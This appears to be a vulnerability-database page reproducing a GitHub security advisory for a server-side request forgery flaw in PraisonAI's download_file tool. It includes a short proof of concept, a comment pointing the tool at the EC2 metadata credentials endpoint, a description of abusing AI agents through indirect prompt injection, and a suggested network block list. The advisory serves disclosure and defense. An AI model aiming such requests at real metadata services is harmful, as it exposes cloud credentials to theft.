GHSA-44C2-3RW4-5GVH

Vulnerability from github – Published: 2026-04-01 23:27 – Updated: 2026-04-06 22:54
VLAI?
Summary
PraisonAI Has SSRF in FileTools.download_file() via Unvalidated URL
Details

Summary

FileTools.download_file() in praisonaiagents validates the destination path but performs no validation on the url parameter, passing it directly to httpx.stream() with follow_redirects=True. An attacker who controls the URL can reach any host accessible from the server including cloud metadata services and internal network services.

Details

file_tools.py:259 (source) -> file_tools.py:296 (sink)

# source -- url taken directly from caller, no validation
def download_file(self, url: str, destination: str, ...):

# sink -- unvalidated url passed to httpx with redirect following
    with httpx.stream("GET", url, timeout=timeout, follow_redirects=True) as response:

PoC

# tested on: praisonaiagents==1.5.87 (source install)
# install: pip install -e src/praisonai-agents
# start listener: python3 -m http.server 8888

import os
os.environ['PRAISONAI_AUTO_APPROVE'] = 'true'
from praisonaiagents.tools.file_tools import download_file

result = download_file(
    url="http://127.0.0.1:8888/ssrf-test",
    destination="/tmp/ssrf_out.txt"
)
print(result)
# listener logs: "GET /ssrf-test HTTP/1.1" 404
# on EC2 with IMDSv1: url="http://169.254.169.254/latest/meta-data/iam/security-credentials/"
# writes IAM credentials to destination file

Impact

On cloud infrastructure with IMDSv1 enabled, an attacker can retrieve IAM credentials via the EC2 metadata service and write them to disk for subsequent agent steps to exfiltrate. follow_redirects=True enables open-redirect chaining to bypass partial URL filters. Reachable via indirect prompt injection with no authentication required.

Suggested Fix

from urllib.parse import urlparse
import ipaddress

BLOCKED_NETWORKS = [
    ipaddress.ip_network("127.0.0.0/8"),
    ipaddress.ip_network("169.254.0.0/16"),
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
]

def _validate_url(url: str) -> None:
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https"):
        raise ValueError(f"Scheme {parsed.scheme!r} not allowed")
    try:
        addr = ipaddress.ip_address(parsed.hostname)
        for net in BLOCKED_NETWORKS:
            if addr in net:
                raise ValueError(f"Requests to {addr} are not permitted")
    except ValueError as e:
        if "does not appear to be" not in str(e):
            raise
Severity ?
8.6 (High)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.5.94"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "praisonaiagents"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.5.95"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-34954"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-01T23:27:07Z",
    "nvd_published_at": "2026-04-03T23:17:06Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n\n`FileTools.download_file()` in `praisonaiagents` validates the destination path but performs no validation on the `url` parameter, passing it directly to `httpx.stream()` with `follow_redirects=True`. An attacker who controls the URL can reach any host accessible from the server including cloud metadata services and internal network services.\n\n### Details\n\n`file_tools.py:259` (source) -\u003e `file_tools.py:296` (sink)\n```python\n# source -- url taken directly from caller, no validation\ndef download_file(self, url: str, destination: str, ...):\n\n# sink -- unvalidated url passed to httpx with redirect following\n    with httpx.stream(\"GET\", url, timeout=timeout, follow_redirects=True) as response:\n```\n\n### PoC\n```bash\n# tested on: praisonaiagents==1.5.87 (source install)\n# install: pip install -e src/praisonai-agents\n# start listener: python3 -m http.server 8888\n\nimport os\nos.environ[\u0027PRAISONAI_AUTO_APPROVE\u0027] = \u0027true\u0027\nfrom praisonaiagents.tools.file_tools import download_file\n\nresult = download_file(\n    url=\"http://127.0.0.1:8888/ssrf-test\",\n    destination=\"/tmp/ssrf_out.txt\"\n)\nprint(result)\n# listener logs: \"GET /ssrf-test HTTP/1.1\" 404\n# on EC2 with IMDSv1: url=\"http://169.254.169.254/latest/meta-data/iam/security-credentials/\"\n# writes IAM credentials to destination file\n```\n\n### Impact\n\nOn cloud infrastructure with IMDSv1 enabled, an attacker can retrieve IAM credentials via the EC2 metadata service and write them to disk for subsequent agent steps to exfiltrate. `follow_redirects=True` enables open-redirect chaining to bypass partial URL filters. Reachable via indirect prompt injection with no authentication required.\n\n### Suggested Fix\n```python\nfrom urllib.parse import urlparse\nimport ipaddress\n\nBLOCKED_NETWORKS = [\n    ipaddress.ip_network(\"127.0.0.0/8\"),\n    ipaddress.ip_network(\"169.254.0.0/16\"),\n    ipaddress.ip_network(\"10.0.0.0/8\"),\n    ipaddress.ip_network(\"172.16.0.0/12\"),\n    ipaddress.ip_network(\"192.168.0.0/16\"),\n]\n\ndef _validate_url(url: str) -\u003e None:\n    parsed = urlparse(url)\n    if parsed.scheme not in (\"http\", \"https\"):\n        raise ValueError(f\"Scheme {parsed.scheme!r} not allowed\")\n    try:\n        addr = ipaddress.ip_address(parsed.hostname)\n        for net in BLOCKED_NETWORKS:\n            if addr in net:\n                raise ValueError(f\"Requests to {addr} are not permitted\")\n    except ValueError as e:\n        if \"does not appear to be\" not in str(e):\n            raise\n```",
  "id": "GHSA-44c2-3rw4-5gvh",
  "modified": "2026-04-06T22:54:29Z",
  "published": "2026-04-01T23:27:07Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-44c2-3rw4-5gvh"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34954"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/MervinPraison/PraisonAI"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "PraisonAI Has SSRF in FileTools.download_file() via Unvalidated URL"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.